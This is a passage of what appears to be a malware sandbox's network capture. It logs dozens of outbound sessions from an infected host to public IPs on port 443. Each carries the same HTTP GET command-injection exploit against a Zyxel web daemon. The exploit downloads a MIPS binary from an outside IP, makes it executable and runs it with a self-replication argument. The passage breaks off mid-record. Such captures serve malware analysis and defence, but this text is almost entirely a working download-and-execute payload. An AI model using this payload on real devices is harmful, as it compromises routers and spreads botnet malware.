                                                        690192.168.2.1456918198.170.126.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115031004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        691192.168.2.1449262141.235.53.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115050077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        692192.168.2.1440610210.133.161.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115089893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        693192.168.2.144111689.49.38.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115144968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        694192.168.2.143427447.54.179.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115204096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        695192.168.2.144423240.126.10.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115225077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        696192.168.2.1456340115.193.242.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115278959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        697192.168.2.1460110139.226.210.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115310907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        698192.168.2.145700688.243.251.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115333080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        699192.168.2.145750291.118.230.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115370989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        700192.168.2.1451858133.24.41.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115451097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        701192.168.2.143574634.152.102.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115462065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        702192.168.2.1455896189.165.146.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115489006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        703192.168.2.143886892.13.2.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115534067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        704192.168.2.1443898145.151.14.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115537882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        705192.168.2.1454532107.61.92.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115612984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        706192.168.2.1454342142.148.120.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115617037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        707192.168.2.1454410210.229.167.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115670919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        708192.168.2.1448700130.194.86.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115745068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        709192.168.2.1436392113.171.251.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115786076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        710192.168.2.1433482217.120.98.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115799904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        711192.168.2.1451954194.41.119.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115845919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        712192.168.2.145686292.50.142.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115885973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        713192.168.2.1443990221.63.130.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115915060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        714192.168.2.145500893.185.166.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.115962029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        715192.168.2.145250619.28.230.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116014957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        716192.168.2.1457722199.207.142.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116054058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        717192.168.2.144135453.218.135.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116107941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        718192.168.2.1441338196.57.229.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116121054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        719192.168.2.14389701.17.213.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116151094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        720192.168.2.14602709.23.94.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116221905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        721192.168.2.144533298.52.205.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116231918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        722192.168.2.1455484154.20.195.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116283894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        723192.168.2.1452040121.161.92.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116302013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        724192.168.2.14335925.203.45.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116348028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        725192.168.2.143791664.104.191.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116380930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        726192.168.2.1441316120.129.147.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116430998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        727192.168.2.1460970159.167.145.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116472960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        728192.168.2.1446296221.102.121.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116544008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        729192.168.2.144007062.219.35.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116558075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        730192.168.2.1451890111.189.244.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116600990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        731192.168.2.1450352150.95.162.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116657972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        732192.168.2.144817693.105.5.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116679907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        733192.168.2.1435770182.79.131.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116695881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        734192.168.2.1437876204.52.10.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116750002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        735192.168.2.1440836166.233.163.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116764069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        736192.168.2.1441970157.103.179.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116825104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        737192.168.2.145741845.23.47.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116882086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        738192.168.2.145865657.175.182.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116902113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        739192.168.2.1457738183.26.59.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116936922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        740192.168.2.1441368176.107.252.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.116961002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        741192.168.2.143718286.94.7.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117010117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        742192.168.2.145061473.214.5.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117084026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        743192.168.2.145341659.25.137.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117131948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        744192.168.2.1437960169.72.127.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117158890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        745192.168.2.1444494146.7.214.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117166042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        746192.168.2.1456928200.150.220.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117238045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        747192.168.2.1433232124.212.246.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117243052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        748192.168.2.1455756183.252.231.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117286921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        749192.168.2.1437944144.216.203.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117320061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        750192.168.2.1444480195.58.27.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.117376089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        751192.168.2.1443818203.81.187.202443
                                                        TimestampBytes transferredDirectionData
